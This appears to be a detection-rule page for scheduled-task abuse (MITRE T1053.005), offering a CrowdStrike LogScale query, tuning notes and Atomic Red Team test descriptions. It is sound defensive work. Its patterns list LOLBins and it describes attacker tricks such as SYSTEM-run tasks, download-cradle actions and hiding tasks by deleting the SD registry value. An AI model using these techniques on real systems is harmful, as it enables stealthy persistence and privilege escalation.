T1053.005 CrowdStrike LogScale · LogScale

Detect Scheduled Task in CrowdStrike LogScale

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. Attackers use schtasks.exe, the Task Scheduler GUI, .NET wrappers, WMI (via Win32_ScheduledJob or PS_ScheduledTask), or direct registry manipulation to create, modify, or delete scheduled tasks. Tasks can run under any account context including SYSTEM, enabling privilege escalation. Adversaries also create hidden tasks by deleting the Security Descriptor (SD) registry value, making tasks invisible to standard enumeration tools.

MITRE ATT&CK

Tactic
Execution Persistence Privilege Escalation
Technique
T1053 Scheduled Task/Job
Sub-technique
T1053.005 Scheduled Task
Canonical reference
https://attack.mitre.org/techniques/T1053/005/

LogScale Detection Query

CrowdStrike LogScale (LogScale)
cql 
// Branch 1: schtasks.exe with suspicious arguments or parent processes
#event_simpleName = ProcessRollup2
| FileName = "schtasks.exe"
| CommandLine = /(?i)\/create|\/change/
| eval HasSuspiciousLoc = if(CommandLine = /(?i)\\AppData\\|\\Temp\\|\\ProgramData\\|\\Public\\|%temp%|%appdata%|%public%/, 1, 0)
| eval HasSuspiciousBin = if(CommandLine = /(?i)cmd\.exe|powershell\.exe|pwsh\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|certutil\.exe|bitsadmin\.exe|msbuild\.exe|wmic\.exe|msiexec\.exe/, 1, 0)
| eval RunAsSystem = if(CommandLine = /(?i)\/ru\s+(system|"system"|"nt authority\\system")/, 1, 0)
| eval RemoteTask = if(CommandLine = /(?i)\/s\s+/, 1, 0)
| eval OnLogonTrigger = if(CommandLine = /(?i)\/sc\s+(onlogon|onstartup|onstart)/, 1, 0)
| eval HighFreqTrigger = if(CommandLine = /(?i)\/sc\s+(minute|hourly)/, 1, 0)
| eval SuspiciousParent = if(ParentBaseFileName = /(?i)powershell\.exe|pwsh\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|msiexec\.exe|wmic\.exe|winword\.exe|excel\.exe|outlook\.exe|acrord32\.exe|msedge\.exe|chrome\.exe|firefox\.exe/, 2, 0)
| eval SuspicionScore = HasSuspiciousLoc + HasSuspiciousBin + RunAsSystem + RemoteTask + OnLogonTrigger + HighFreqTrigger + SuspiciousParent
| where SuspicionScore > 0
| eval DetectionBranch = "schtasks_suspicious_args_or_parent"
| table [@timestamp, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine,
         HasSuspiciousLoc, HasSuspiciousBin, RunAsSystem, RemoteTask, OnLogonTrigger, HighFreqTrigger,
         SuspiciousParent, SuspicionScore, DetectionBranch]

// Branch 2: schtasks.exe spawned by suspicious parent (no /create filter — catches any schtasks invocation)
OR (
  #event_simpleName = ProcessRollup2
  | FileName = "schtasks.exe"
  | ParentBaseFileName = /(?i)powershell\.exe|pwsh\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|winword\.exe|excel\.exe|outlook\.exe|acrord32\.exe|msedge\.exe|chrome\.exe|firefox\.exe/
  | not CommandLine = /(?i)\/create|\/change/
  | eval SuspicionScore = 2
  | eval DetectionBranch = "schtasks_suspicious_parent_any_operation"
  | table [@timestamp, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine,
           SuspicionScore, DetectionBranch]
)

// Branch 3: Registry writes to Task Scheduler TaskCache by non-system processes
OR (
  #event_simpleName = RegGenericValueUpdate OR #event_simpleName = RegKeyCreate
  | RegObjectName = /(?i)\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\/
  | not ImageFileName = /(?i)svchost\.exe|taskeng\.exe|taskhostw\.exe/
  | eval SuspicionScore = 1
  | eval DetectionBranch = "registry_taskcache_write"
  | table [@timestamp, ComputerName, UserName, ImageFileName, CommandLine, RegObjectName,
           RegValueName, SuspicionScore, DetectionBranch]
)
| sort SuspicionScore desc, @timestamp desc
high severity high confidence

Detects Windows Scheduled Task abuse (T1053.005) across three detection branches using CrowdStrike Falcon telemetry. Branch 1 identifies schtasks.exe process creation events with /create or /change flags combined with suspicious indicators (LOLBin invocations, suspicious file locations, SYSTEM run-as context, remote task creation, logon/startup triggers, high-frequency scheduling) and scores them with a multi-factor suspicion model. Branch 2 catches any schtasks.exe invocation (including list/delete/query) originating from Office applications, browsers, or script interpreters — a high-confidence indicator of LOLBin or document-based abuse. Branch 3 detects direct registry writes to the TaskCache key from processes outside of legitimate Windows Task Scheduler infrastructure, which can indicate hidden task creation or evasion of standard enumeration APIs.

Data Sources

CrowdStrike Falcon EDR - ProcessRollup2 events (process creation with full command line)CrowdStrike Falcon EDR - RegGenericValueUpdate and RegKeyCreate events (registry modification)CrowdStrike Falcon - Endpoint Activity Monitor

Required Tables

ProcessRollup2RegGenericValueUpdateRegKeyCreate

False Positives & Tuning

  • Legitimate enterprise deployment tools (SCCM, Intune, PDQ Deploy) that invoke schtasks.exe from administrative scripts running under PowerShell or cmd.exe to provision application maintenance tasks on managed endpoints.
  • Software installation processes for productivity suites (Microsoft Office, Adobe Acrobat) that may spawn schtasks.exe to register update schedulers in AppData or ProgramData paths during initial installation.
  • Security tools and EDR agents that write directly to the Task Scheduler registry keys as part of self-protection, persistence, or scheduled scan configuration mechanisms.
  • Developer tooling on workstation endpoints where build systems, test runners, or local automation scripts use schtasks.exe to configure scheduled jobs for background tasks in development environments.
Download portable Sigma rule (.yml)

Other platforms for T1053.005

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) All platforms (combined) →

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Create Persistence Scheduled Task Running as SYSTEM

    Expected signal: Sysmon Event ID 1: Process Create with Image=schtasks.exe, CommandLine containing '/create', '/tn WindowsSystemCheck', '/ru SYSTEM', '/sc onstart'. Security Event ID 4688 (if command line auditing enabled). Security Event ID 4698 (Scheduled Task Created) in Security log with task XML showing SYSTEM principal. Registry key created under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\ (ONSTART trigger).

  2. Test 2Scheduled Task with PowerShell Download Cradle Action

    Expected signal: Sysmon Event ID 1: schtasks.exe with full command line including the PowerShell cradle. Security Event ID 4698 with task XML showing PowerShell action with hidden window and download cradle. Task XML file written to C:\Windows\System32\Tasks\MicrosoftEdgeUpdateCheck. Registry entries created under TaskCache\Logon\.

  3. Test 3Scheduled Task Created via PowerShell (Invoke-CimMethod)

    Expected signal: Sysmon Event ID 1: powershell.exe process with command line containing Register-ScheduledTask. Security Event ID 4698: Scheduled Task Created (WmiTaskTest). Sysmon Event ID 13: Registry value written to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\ by powershell.exe (not svchost.exe). Task XML file written to C:\Windows\System32\Tasks\WmiTaskTest.

  4. Test 4Hidden Scheduled Task via SD Registry Value Deletion

    Expected signal: Sysmon Event ID 1: schtasks.exe creating the task. Sysmon Event ID 14 (Registry Key/Value Deleted): TargetObject = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HiddenPersistTask\SD, Image = reg.exe. Security Event ID 4698: task created. After SD deletion, task is absent from schtasks /query but still active in TaskCache.

  5. Test 5Remote Scheduled Task Creation for Lateral Movement

    Expected signal: Sysmon Event ID 1: schtasks.exe with CommandLine containing '/s 127.0.0.1', '/ru SYSTEM', '/create'. Security Event ID 4698: Scheduled Task Created on target (local) system. Network connection attempt to localhost Task Scheduler RPC interface (port 135/dynamic RPC). Security Event ID 4648 (Logon with explicit credentials) if alternate credentials used.

Last updated: 2026-04-16 Research depth: deep
References (11)

Unlock Pro Content

Get the full detection package for T1053.005 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1053Scheduled Task/Job

Related Sub-techniques

T1053.002AtT1053.003CronT1053.006Systemd TimersT1053.007Container Orchestration Job

Related Techniques

T1053Scheduled Task/JobT1059.001PowerShellT1059.003Windows Command ShellT1047Windows Management InstrumentationT1564.001Hidden Files and DirectoriesT1564Hide ArtifactsT1078Valid AccountsT1021.002SMB/Windows Admin SharesT1218System Binary Proxy ExecutionT1055Process InjectionT1112Modify RegistryT1562.001Disable or Modify Tools

Same Tactic: Execution

Popular Detections